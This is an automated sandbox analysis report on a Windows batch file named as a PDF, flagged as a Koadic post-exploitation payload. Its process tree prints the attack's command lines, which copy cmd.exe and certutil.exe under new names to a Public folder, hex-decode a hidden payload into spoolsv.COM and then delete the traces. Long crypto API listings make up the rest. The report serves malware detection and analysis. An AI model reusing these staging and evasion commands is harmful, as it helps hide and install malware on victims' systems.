
Windows Analysis Report
1x40 CONTAINER.PDF-.bat

Overview

General Information

Sample name: 1x40 CONTAINER.PDF-.bat
Analysis ID: 1569543
MD5: 91f00c06e8cc61fe9239eefdb0dd0c03
SHA1: d37a062f52f67920062bc5c6bf67a846ac431e9e
SHA256: c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Drops PE files to the user root directory
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Registers a new ROOT certificate
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7332 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7356 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7372 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7400 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7416 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7444 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7460 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 7480 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 7512 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
Source: 1x40 CONTAINER.PDF-.bat
Rule: MALWARE_BAT_KoadicBAT
Description: Koadic post-exploitation framework BAT payload
Author: ditekSHen
Strings:
  • 0x2:$s1: &@cls&@set
  • 0x59:$s2: :~57,1%%
  • 0x64:$s2: :~50,1%%
  • 0x6f:$s2: :~44,1%%
  • 0x7a:$s2: :~39,1%%
  • 0x85:$s2: :~4,1%
  • 0x96:$s2: :~46,1%%
  • 0xa1:$s2: :~15,1%%
  • 0xac:$s2: :~49,1%%
  • 0xb7:$s2: :~0,1%%
  • 0xc1:$s2: :~37,1%%
  • 0xcc:$s2: :~42,1%%
  • 0xd7:$s2: :~23,1%%
  • 0xe2:$s2: :~40,1%%
  • 0xed:$s2: :~19,1%%
  • 0xf8:$s2: :~60,1%%
  • 0x103:$s2: :~4,1%%
  • 0x10d:$s2: :~47,1%%
  • 0x118:$s2: :~56,1%%
  • 0x123:$s2: :~35,1%%
  • 0x12e:$s2: :~39,1%%

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7276, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7356, ProcessName: alpha.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7356, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7372, ProcessName: extrac32.exe
No Suricata rule has matched


AV Detection

Source: 1x40 CONTAINER.PDF-.bat; ReversingLabs: Detection: 27%
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,6_2_00007FF6C54D4A34
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,6_2_00007FF6C54F4A1C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0A18 BCryptSetProperty,#205,#359,#357,#357,6_2_00007FF6C54F0A18
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C552A9F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,6_2_00007FF6C54BE9F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,6_2_00007FF6C54F2C80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5534C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,6_2_00007FF6C5534C80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,6_2_00007FF6C54FACAC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526C88 NCryptEnumAlgorithms,#360,6_2_00007FF6C5526C88
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C54E4CA0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5528C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF6C5528C58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5456C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6C5456C4C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0C3C NCryptExportKey,#205,#359,#359,#357,6_2_00007FF6C54F0C3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0D14 NCryptFinalizeKey,#205,#357,#357,6_2_00007FF6C54F0D14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526D2C NCryptFreeBuffer,#360,6_2_00007FF6C5526D2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,6_2_00007FF6C54F2CFC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,6_2_00007FF6C54E2CF8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C54B2D18
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526CE0 NCryptEnumStorageProviders,#360,6_2_00007FF6C5526CE0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B4CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,6_2_00007FF6C54B4CC0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5548CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF6C5548CF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5520B9C CryptHashData,GetLastError,#357,6_2_00007FF6C5520B9C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF6C54F0B80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF6C551CBB4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF6C547CB98
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C555EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF6C555EB38
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5526C30 NCryptOpenStorageProvider,#360,6_2_00007FF6C5526C30
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF6C548CC24
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F2BC0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5520BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF6C5520BF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF6C550D6A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A76B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C54A76B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5519688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF6C5519688
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F3654
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54EF644
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF6C54C366C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF6C54DB664
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F650 CryptHashCertificate2,SetLastError,6_2_00007FF6C551F650
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5465664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF6C5465664
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF6C547D660
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F36E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF6C54DF6D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F3590
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5529580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF6C5529580
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F570 CryptHashCertificate,SetLastError,6_2_00007FF6C551F570
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF6C54BB55C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF6C54D95FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547F630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF6C547F630
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C547D5C2
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF6C54B55F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C55298B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5487884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF6C5487884
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,6_2_00007FF6C54C9878
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,6_2_00007FF6C54DD850
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6C54E184C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F3860
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,6_2_00007FF6C551F918
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54638FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6C54638FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5473918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5473918
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,6_2_00007FF6C54F391C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB8D0 I_CryptGetLruEntryData,#357,6_2_00007FF6C54DB8D0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54C18DC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF6C548D790
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C546B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF6C546B788
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54C577C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F37A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF6C550B794
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF6C54BF774
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F5768
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF6C551D750
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF6C548F810
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF6C54DB808
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6C551F7FC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54917D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF6C54917D4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55097E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF6C55097E4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF6C54BB2B4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F32A8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF6C551D28C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF6C5527290
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6C548D240
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF6C54DD30C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF6C548D304
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF6C548B324
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6C54D32D0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF6C54B92C4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54EF2F0
